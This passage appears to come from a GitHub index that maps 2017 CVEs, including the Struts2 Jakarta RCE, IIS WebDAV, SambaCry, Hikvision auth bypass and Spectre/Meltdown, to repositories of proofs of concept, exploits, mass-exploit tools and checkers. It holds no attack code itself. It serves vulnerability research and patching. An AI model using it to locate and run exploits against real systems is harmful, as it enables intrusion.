[donaldashdown/Common-Vulnerability-and-Exploit](https://github.com/donaldashdown/Common-Vulnerability-and-Exploit) +- [sighup1/cybersecurity-struts2](https://github.com/sighup1/cybersecurity-struts2) +- [cafnet/apache-struts-v2-CVE-2017-5638](https://github.com/cafnet/apache-struts-v2-CVE-2017-5638) +- [0x00-0x00/CVE-2017-5638](https://github.com/0x00-0x00/CVE-2017-5638) +- [m3ssap0/struts2_cve-2017-5638](https://github.com/m3ssap0/struts2_cve-2017-5638) +- [Greynad/struts2-jakarta-inject](https://github.com/Greynad/struts2-jakarta-inject) +- [ggolawski/struts-rce](https://github.com/ggolawski/struts-rce) +- [win3zz/CVE-2017-5638](https://github.com/win3zz/CVE-2017-5638) +- [leandrocamposcardoso/CVE-2017-5638-Mass-Exploit](https://github.com/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit) +- [Iletee/struts2-rce](https://github.com/Iletee/struts2-rce) +- [andypitcher/check_struts](https://github.com/andypitcher/check_struts) +- [un4ckn0wl3z/CVE-2017-5638](https://github.com/un4ckn0wl3z/CVE-2017-5638) +- [colorblindpentester/CVE-2017-5638](https://github.com/colorblindpentester/CVE-2017-5638) +- [injcristianrojas/cve-2017-5638](https://github.com/injcristianrojas/cve-2017-5638) +- [ludy-dev/XworkStruts-RCE](https://github.com/ludy-dev/XworkStruts-RCE) +- [sonatype-workshops/struts2-rce](https://github.com/sonatype-workshops/struts2-rce) +- [jongmartinez/CVE-2017-5638](https://github.com/jongmartinez/CVE-2017-5638) +- [Badbird3/CVE-2017-5638](https://github.com/Badbird3/CVE-2017-5638) +- [jptr218/struts_hack](https://github.com/jptr218/struts_hack) +- [testpilot031/vulnerability_struts-2.3.31](https://github.com/testpilot031/vulnerability_struts-2.3.31) +- [readloud/CVE-2017-5638](https://github.com/readloud/CVE-2017-5638) +- [Tankirat/CVE-2017-5638](https://github.com/Tankirat/CVE-2017-5638) +- [0xConstant/CVE-2017-5638](https://github.com/0xConstant/CVE-2017-5638) +- [mfdev-solution/Exploit-CVE-2017-5638](https://github.com/mfdev-solution/Exploit-CVE-2017-5638) +- [mritunjay-k/CVE-2017-5638](https://github.com/mritunjay-k/CVE-2017-5638) +- [FredBrave/CVE-2017-5638-ApacheStruts2.3.5](https://github.com/FredBrave/CVE-2017-5638-ApacheStruts2.3.5) +- [Nithylesh/web-application-firewall-](https://github.com/Nithylesh/web-application-firewall-) +- [kloutkake/CVE-2017-5638-PoC](https://github.com/kloutkake/CVE-2017-5638-PoC) + +### CVE-2017-5645 (2017-04-17) + +In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + + +- [pimps/CVE-2017-5645](https://github.com/pimps/CVE-2017-5645) +- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder) + +### CVE-2017-5689 (2017-05-02) + +An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT). + + +- [CerberusSecurity/CVE-2017-5689](https://github.com/CerberusSecurity/CVE-2017-5689) +- [haxrob/amthoneypot](https://github.com/haxrob/amthoneypot) +- [Bijaye/intel_amt_bypass](https://github.com/Bijaye/intel_amt_bypass) +- [embedi/amt_auth_bypass_poc](https://github.com/embedi/amt_auth_bypass_poc) +- [TheWay-hue/CVE-2017-5689-Checker](https://github.com/TheWay-hue/CVE-2017-5689-Checker) + +### CVE-2017-5693 (2018-07-31) + +Firmware in the Intel Puma 5, 6, and 7 Series might experience resource depletion or timeout, which allows a network attacker to create a denial of service via crafted network traffic. + + +- [LunNova/Puma6Fail](https://github.com/LunNova/Puma6Fail) + +### CVE-2017-5715 (2018-01-04) + +Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. + + +- [opsxcq/exploit-cve-2017-5715](https://github.com/opsxcq/exploit-cve-2017-5715) +- [mathse/meltdown-spectre-bios-list](https://github.com/mathse/meltdown-spectre-bios-list) +- [GregAskew/SpeculativeExecutionAssessment](https://github.com/GregAskew/SpeculativeExecutionAssessment) +- [dmo2118/retpoline-audit](https://github.com/dmo2118/retpoline-audit) +- [GalloLuigi/Analisi-CVE-2017-5715](https://github.com/GalloLuigi/Analisi-CVE-2017-5715) + +### CVE-2017-5721 (2017-10-11) + +Insufficient input validation in system firmware for Intel NUC7i3BNK, NUC7i3BNH, NUC7i5BNK, NUC7i5BNH, NUC7i7BNH versions BN0049 and below allows local attackers to execute arbitrary code via manipulation of memory. + + +- [embedi/smm_usbrt_poc](https://github.com/embedi/smm_usbrt_poc) + +### CVE-2017-5753 (2018-01-04) + +Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. + + +- [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) +- [EdwardOwusuAdjei/Spectre-PoC](https://github.com/EdwardOwusuAdjei/Spectre-PoC) +- [00052/spectre-attack-example](https://github.com/00052/spectre-attack-example) +- [pedrolucasoliva/spectre-attack-demo](https://github.com/pedrolucasoliva/spectre-attack-demo) +- [ixtal23/spectreScope](https://github.com/ixtal23/spectreScope) +- [albertleecn/cve-2017-5753](https://github.com/albertleecn/cve-2017-5753) +- [sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-](https://github.com/sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-) + +### CVE-2017-5754 (2018-01-04) + +Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. + + +- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck) +- [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown) +- [Viralmaniar/In-Spectre-Meltdown](https://github.com/Viralmaniar/In-Spectre-Meltdown) +- [speecyy/Am-I-affected-by-Meltdown](https://github.com/speecyy/Am-I-affected-by-Meltdown) +- [zzado/Meltdown](https://github.com/zzado/Meltdown) +- [jdmulloy/meltdown-aws-scanner](https://github.com/jdmulloy/meltdown-aws-scanner) + +### CVE-2017-5792 (2018-02-15) + +A Remote Code Execution vulnerability in HPE Intelligent Management Center (iMC) PLAT version 7.3 E0504P2 was found. + + +- [scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization](https://github.com/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization) + +### CVE-2017-5941 (2017-02-09) + +An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). + + +- [Frivolous-scholar/CVE-2017-5941-NodeJS-RCE](https://github.com/Frivolous-scholar/CVE-2017-5941-NodeJS-RCE) +- [turnernator1/Node.js-CVE-2017-5941](https://github.com/turnernator1/Node.js-CVE-2017-5941) +- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133) +- [uartu0/nodejshell](https://github.com/uartu0/nodejshell) + +### CVE-2017-6008 (2017-09-13) + +A kernel pool overflow in the driver hitmanpro37.sys in Sophos SurfRight HitmanPro before 3.7.20 Build 286 (included in the HitmanPro.Alert solution and Sophos Clean) allows local users to escalate privileges via a malformed IOCTL call. + + +- [cbayet/Exploit-CVE-2017-6008](https://github.com/cbayet/Exploit-CVE-2017-6008) + +### CVE-2017-6074 (2017-02-18) + +The dccp_rcv_state_process function in net/dccp/input.c in the Linux kernel through 4.9.11 mishandles DCCP_PKT_REQUEST packet data structures in the LISTEN state, which allows local users to obtain root privileges or cause a denial of service (double free) via an application that makes an IPV6_RECVPKTINFO setsockopt system call. + + +- [BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074](https://github.com/BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074) +- [toanthang1842002/CVE-2017-6074](https://github.com/toanthang1842002/CVE-2017-6074) + +### CVE-2017-6079 (2017-05-16) + +The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables routes, etc., to be set. You can use this page as a web shell essentially to execute commands, though you get no feedback client-side from the web application: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006. + + +- [MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit](https://github.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit) + +### CVE-2017-6090 (2017-10-02) + +Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/. + + +- [jlk/exploit-CVE-2017-6090](https://github.com/jlk/exploit-CVE-2017-6090) + +### CVE-2017-6206 (2017-02-23) + +D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure attacks via unspecified vectors. + + +- [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206) + +### CVE-2017-6370 (2017-03-17) + +TYPO3 7.6.15 sends an http request to an index.php?loginProvider URI in cases with an https Referer, which allows remote attackers to obtain sensitive cleartext information by sniffing the network and reading the userident and username fields. + + +- [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://github.com/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request) + +### CVE-2017-6516 (2017-03-14) + +A Local Privilege Escalation Vulnerability in MagniComp's Sysinfo before 10-H64 for Linux and UNIX platforms could allow a local attacker to gain elevated privileges. Parts of SysInfo require setuid-to-root access in order to access restricted system files and make restricted kernel calls. This access could be exploited by a local attacker to gain a root shell prompt using the right combination of environment variables and command line arguments. + + +- [Rubytox/CVE-2017-6516-mcsiwrapper-](https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-) + +### CVE-2017-6558 (2017-03-09) + +iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file. + + +- [GemGeorge/iBall-UTStar-CVEChecker](https://github.com/GemGeorge/iBall-UTStar-CVEChecker) + +### CVE-2017-6640 (2017-06-08) + +A vulnerability in Cisco Prime Data Center Network Manager (DCNM) Software could allow an unauthenticated, remote attacker to log in to the administrative console of a DCNM server by using an account that has a default, static password. The account could be granted root- or system-level privileges. The vulnerability exists because the affected software has a default user account that has a default, static password. The user account is created automatically when the software is installed. An attacker could exploit this vulnerability by connecting remotely to an affected system and logging in to the affected software by using the credentials for this default user account. A successful exploit could allow the attacker to use this default user account to log in to the affected software and gain access to the administrative console of a DCNM server. This vulnerability affects Cisco Prime Data Center Network Manager (DCNM) Software releases prior to Release 10.2(1) for Microsoft Windows, Linux, and Virtual Appliance platforms. Cisco Bug IDs: CSCvd95346. + + +- [hemp3l/CVE-2017-6640-POC](https://github.com/hemp3l/CVE-2017-6640-POC) + +### CVE-2017-6736 (2017-07-17) + +The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP: Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. Cisco Bug IDs: CSCve57697. + + +- [GarnetSunset/CiscoSpectreTakeover](https://github.com/GarnetSunset/CiscoSpectreTakeover) +- [GarnetSunset/CiscoIOSSNMPToolkit](https://github.com/GarnetSunset/CiscoIOSSNMPToolkit) + +### CVE-2017-6913 (2018-09-18) + +Cross-site scripting (XSS) vulnerability in the Open-Xchange webmail before 7.6.3-rev28 allows remote attackers to inject arbitrary web script or HTML via the event attribute in a time tag. + + +- [gquere/CVE-2017-6913](https://github.com/gquere/CVE-2017-6913) + +### CVE-2017-6971 (2017-03-22) + +AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862. + + +- [patrickfreed/nfsen-exploit](https://github.com/patrickfreed/nfsen-exploit) +- [KeyStrOke95/nfsen_1.3.7_CVE-2017-6971](https://github.com/KeyStrOke95/nfsen_1.3.7_CVE-2017-6971) + +### CVE-2017-7038 (2017-07-20) + +A DOMParser XSS issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. tvOS before 10.2.2 is affected. The issue involves the "WebKit" component. + + +- [ansjdnakjdnajkd/CVE-2017-7038](https://github.com/ansjdnakjdnajkd/CVE-2017-7038) + +### CVE-2017-7047 (2017-07-20) + +An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. macOS before 10.12.6 is affected. tvOS before 10.2.2 is affected. watchOS before 3.2.3 is affected. The issue involves the "libxpc" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. + + +- [JosephShenton/Triple_Fetch-Kernel-Creds](https://github.com/JosephShenton/Triple_Fetch-Kernel-Creds) +- [q1f3/Triple_fetch](https://github.com/q1f3/Triple_fetch) + +### CVE-2017-7089 (2017-10-23) + +An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing. + + +- [Bo0oM/CVE-2017-7089](https://github.com/Bo0oM/CVE-2017-7089) +- [aymankhalfatni/Safari_Mac](https://github.com/aymankhalfatni/Safari_Mac) + +### CVE-2017-7092 (2017-10-23) + +An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. iTunes before 12.7 on Windows is affected. tvOS before 11 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. + + +- [xuechiyaobai/CVE-2017-7092-PoC](https://github.com/xuechiyaobai/CVE-2017-7092-PoC) + +### CVE-2017-7173 (2018-04-03) + +An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app. + + +- [bazad/sysctl_coalition_get_pid_list-dos](https://github.com/bazad/sysctl_coalition_get_pid_list-dos) + +### CVE-2017-7184 (2017-03-19) + +The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel through 4.10.6 does not validate certain size data after an XFRM_MSG_NEWAE update, which allows local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-image-* package 4.8.0.41.52. + + +- [rockl/cve-2017-7184](https://github.com/rockl/cve-2017-7184) +- [rockl/cve-2017-7184-bak](https://github.com/rockl/cve-2017-7184-bak) + +### CVE-2017-7188 (2017-04-14) + +Zurmo 3.1.1 Stable allows a Cross-Site Scripting (XSS) attack with a base64-encoded SCRIPT element within a data: URL in the returnUrl parameter to default/toggleCollapse. + + +- [faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC](https://github.com/faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC) + +### CVE-2017-7269 (2017-03-27) + +Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016. + + +- [eliuha/webdav_exploit](https://github.com/eliuha/webdav_exploit) +- [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC) +- [caicai1355/CVE-2017-7269-exploit](https://github.com/caicai1355/CVE-2017-7269-exploit) +- [M1a0rz/CVE-2017-7269](https://github.com/M1a0rz/CVE-2017-7269) +- [whiteHat001/cve-2017-7269picture](https://github.com/whiteHat001/cve-2017-7269picture) +- [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269) +- [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269) +- [slimpagey/IIS_6.0_WebDAV_Ruby](https://github.com/slimpagey/IIS_6.0_WebDAV_Ruby) +- [homjxi0e/cve-2017-7269](https://github.com/homjxi0e/cve-2017-7269) +- [xiaovpn/CVE-2017-7269](https://github.com/xiaovpn/CVE-2017-7269) +- [zcgonvh/cve-2017-7269-tool](https://github.com/zcgonvh/cve-2017-7269-tool) +- [mirrorblack/CVE-2017-7269](https://github.com/mirrorblack/CVE-2017-7269) +- [Al1ex/CVE-2017-7269](https://github.com/Al1ex/CVE-2017-7269) +- [ThanHuuTuan/CVE-2017-7269](https://github.com/ThanHuuTuan/CVE-2017-7269) +- [n3rdh4x0r/CVE-2017-7269](https://github.com/n3rdh4x0r/CVE-2017-7269) +- [denchief1/CVE-2017-7269_Python3](https://github.com/denchief1/CVE-2017-7269_Python3) +- [denchief1/CVE-2017-7269](https://github.com/denchief1/CVE-2017-7269) +- [Cappricio-Securities/CVE-2017-7269](https://github.com/Cappricio-Securities/CVE-2017-7269) +- [VanishedPeople/CVE-2017-7269](https://github.com/VanishedPeople/CVE-2017-7269) +- [geniuszlyy/CVE-2017-7269](https://github.com/geniuszlyy/CVE-2017-7269) +- [AxthonyV/CVE-2017-7269](https://github.com/AxthonyV/CVE-2017-7269) + +### CVE-2017-7308 (2017-03-29) + +The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted system calls. + + +- [anldori/CVE-2017-7308](https://github.com/anldori/CVE-2017-7308) + +### CVE-2017-7358 (2017-04-05) + +In LightDM through 1.22.0, a directory traversal issue in debian/guest-account.sh allows local attackers to own arbitrary directory path locations and escalate privileges to root when the guest user logs out. + + +- [JonPichel/CVE-2017-7358](https://github.com/JonPichel/CVE-2017-7358) + +### CVE-2017-7374 (2017-03-31) + +Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely. + + +- [ww9210/cve-2017-7374](https://github.com/ww9210/cve-2017-7374) + +### CVE-2017-7376 (2018-02-19) + +Buffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects. + + +- [brahmstaedt/libxml2-exploit](https://github.com/brahmstaedt/libxml2-exploit) + +### CVE-2017-7410 (2017-04-03) + +Multiple SQL injection vulnerabilities in account/signup.php and account/signup2.php in WebsiteBaker 2.10.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username, (2) display_name parameter. + + +- [ashangp923/CVE-2017-7410](https://github.com/ashangp923/CVE-2017-7410) + +### CVE-2017-7472 (2017-05-11) + +The KEYS subsystem in the Linux kernel before 4.10.13 allows local users to cause a denial of service (memory consumption) via a series of KEY_REQKEY_DEFL_THREAD_KEYRING keyctl_set_reqkey_keyring calls. + + +- [homjxi0e/CVE-2017-7472](https://github.com/homjxi0e/CVE-2017-7472) + +### CVE-2017-7494 (2017-05-30) + +Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it. + + +- [betab0t/cve-2017-7494](https://github.com/betab0t/cve-2017-7494) +- [homjxi0e/CVE-2017-7494](https://github.com/homjxi0e/CVE-2017-7494) +- [opsxcq/exploit-CVE-2017-7494](https://github.com/opsxcq/exploit-CVE-2017-7494) +- [Waffles-2/SambaCry](https://github.com/Waffles-2/SambaCry) +- [brianwrf/SambaHunter](https://github.com/brianwrf/SambaHunter) +- [joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494) +- [Zer0d0y/Samba-CVE-2017-7494](https://github.com/Zer0d0y/Samba-CVE-2017-7494) +- [incredible1yu/CVE-2017-7494](https://github.com/incredible1yu/CVE-2017-7494) +- [cved-sources/cve-2017-7494](https://github.com/cved-sources/cve-2017-7494) +- [john-80/cve-2017-7494](https://github.com/john-80/cve-2017-7494) +- [Hansindu-M/CVE-2017-7494_IT19115344](https://github.com/Hansindu-M/CVE-2017-7494_IT19115344) +- [0xm4ud/noSAMBAnoCRY-CVE-2017-7494](https://github.com/0xm4ud/noSAMBAnoCRY-CVE-2017-7494) +- [I-Rinka/BIT-EternalBlue-for-macOS_Linux](https://github.com/I-Rinka/BIT-EternalBlue-for-macOS_Linux) +- [adjaliya/-CVE-2017-7494-Samba-Exploit-POC](https://github.com/adjaliya/-CVE-2017-7494-Samba-Exploit-POC) +- [00mjk/exploit-CVE-2017-7494](https://github.com/00mjk/exploit-CVE-2017-7494) +- [d3fudd/CVE-2017-7494_SambaCry](https://github.com/d3fudd/CVE-2017-7494_SambaCry) + +### CVE-2017-7504 (2017-05-19) + +HTTPServerILServlet.java in JMS over HTTP Invocation Layer of the JbossMQ implementation, which is enabled by default in Red Hat Jboss Application Server <= Jboss 4.X does not restrict the classes for which it performs deserialization, which allows remote attackers to execute arbitrary code via crafted serialized data. + + +- [wudidwo/CVE-2017-7504-poc](https://github.com/wudidwo/CVE-2017-7504-poc) + +### CVE-2017-7525 (2018-02-06) + +A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. + + +- [SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095](https://github.com/SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095) +- [Nazicc/S2-055](https://github.com/Nazicc/S2-055) +- [JavanXD/Demo-Exploit-Jackson-RCE](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE) +- [BassinD/jackson-RCE](https://github.com/BassinD/jackson-RCE) +- [Dannners/jackson-deserialization-2017-7525](https://github.com/Dannners/jackson-deserialization-2017-7525) +- [Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab](https://github.com/Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab) + +### CVE-2017-7529 (2017-07-13) + +Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. + + +- [liusec/CVE-2017-7529](https://github.com/liusec/CVE-2017-7529) +- [en0f/CVE-2017-7529_PoC](https://github.com/en0f/CVE-2017-7529_PoC) +- [cved-sources/cve-2017-7529](https://github.com/cved-sources/cve-2017-7529) +- [MaxSecurity/CVE-2017-7529-POC](https://github.com/MaxSecurity/CVE-2017-7529-POC) +- [cyberk1w1/CVE-2017-7529](https://github.com/cyberk1w1/CVE-2017-7529) +- [cyberharsh/nginx-CVE-2017-7529](https://github.com/cyberharsh/nginx-CVE-2017-7529) +- [daehee/nginx-overflow](https://github.com/daehee/nginx-overflow) +- [gemboxteam/exploit-nginx-1.10.3](https://github.com/gemboxteam/exploit-nginx-1.10.3) +- [fardeen-ahmed/Remote-Integer-Overflow-Vulnerability](https://github.com/fardeen-ahmed/Remote-Integer-Overflow-Vulnerability) +- [mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability](https://github.com/mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability) +- [fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit](https://github.com/fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit) +- [Shehzadcyber/CVE-2017-7529](https://github.com/Shehzadcyber/CVE-2017-7529) +- [coolman6942o/-Exploit-CVE-2017-7529](https://github.com/coolman6942o/-Exploit-CVE-2017-7529) +- [SirEagIe/CVE-2017-7529](https://github.com/SirEagIe/CVE-2017-7529) + +### CVE-2017-7648 (2017-04-10) + +Foscam networked devices use the same hardcoded SSL private key across different customers' installations, which allows remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of this key from another installation. + + +- [notmot/CVE-2017-7648.](https://github.com/notmot/CVE-2017-7648.) + +### CVE-2017-7651 (2018-04-24) + +In Eclipse Mosquitto 1.4.14, a user can shutdown the Mosquitto server simply by filling the RAM memory with a lot of connections with large payload. This can be done without authentications if occur in connection phase of MQTT protocol. + + +- [mukkul007/MqttAttack](https://github.com/mukkul007/MqttAttack) +- [St3v3nsS/CVE-2017-7651](https://github.com/St3v3nsS/CVE-2017-7651) + +### CVE-2017-7679 (2017-06-20) + +In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header. + + +- [snknritr/CVE-2017-7679-in-python](https://github.com/snknritr/CVE-2017-7679-in-python) + +### CVE-2017-7912 (2019-04-08) + +Hanwha Techwin SRN-4000, SRN-4000 firmware versions prior to SRN4000_v2.16_170401, A specially crafted http request and response could allow an attacker to gain access to the device management page with admin privileges without proper authentication. + + +- [homjxi0e/CVE-2017-7912_Sneak](https://github.com/homjxi0e/CVE-2017-7912_Sneak) + +### CVE-2017-7921 (2017-05-06) + +An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. + + +- [JrDw0/CVE-2017-7921-EXP](https://github.com/JrDw0/CVE-2017-7921-EXP) +- [BurnyMcDull/CVE-2017-7921](https://github.com/BurnyMcDull/CVE-2017-7921) +- [MisakaMikato/cve-2017-7921-golang](https://github.com/MisakaMikato/cve-2017-7921-golang) +- [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) +- [p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) +- [201646613/CVE-2017-7921](https://github.com/201646613/CVE-2017-7921) +- [inj3ction/CVE-2017-7921-EXP](https://github.com/inj3ction/CVE-2017-7921-EXP) +- [krypton612/hikivision](https://github.com/krypton612/hikivision) +- [K3ysTr0K3R/CVE-2017-7921-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-7921-EXPLOIT) +- [fracergu/CVE-2017-7921](https://github.com/fracergu/CVE-2017-7921) +- [AnonkiGroup/AnonHik](https://github.com/AnonkiGroup/AnonHik) +- [b3pwn3d/CVE-2017-7921](https://github.com/b3pwn3d/CVE-2017-7921) +- [yousouf-Tasfin/cve-2017-7921-Mass-Exploit](https://github.com/yousouf-Tasfin/cve-2017-7921-Mass-Exploit) +- [kooroshsanaei/HikVision-CVE-2017-7921](https://github.com/kooroshsanaei/HikVision-CVE-2017-7921) +- [aengussong/hikvision_probe](https://github.com/aengussong/hikvision_probe) + +### CVE-2017-7998 (2018-01-08) + +Multiple cross-site scripting (XSS) vulnerabilities in Gespage before 7.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) printer name when adding a printer in the admin panel or (2) username parameter to webapp/users/user_reg.jsp. + + +- [homjxi0e/CVE-2017-7998](https://github.com/homjxi0e/CVE-2017-7998) + +### CVE-2017-8046 (2018-01-04) + +Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code. + + +- [Soontao/CVE-2017-8046-DEMO](https://github.com/Soontao/CVE-2017-8046-DEMO) +- [sj/spring-data-rest-CVE-2017-8046](https://github.com/sj/spring-data-rest-CVE-2017-8046) +- [m3ssap0/SpringBreakVulnerableApp](https://github.com/m3ssap0/SpringBreakVulnerableApp) +- [m3ssap0/spring-break_cve-2017-8046](https://github.com/m3ssap0/spring-break_cve-2017-8046) +- [FixYourFace/SpringBreakPoC](https://github.com/FixYourFace/SpringBreakPoC) +- 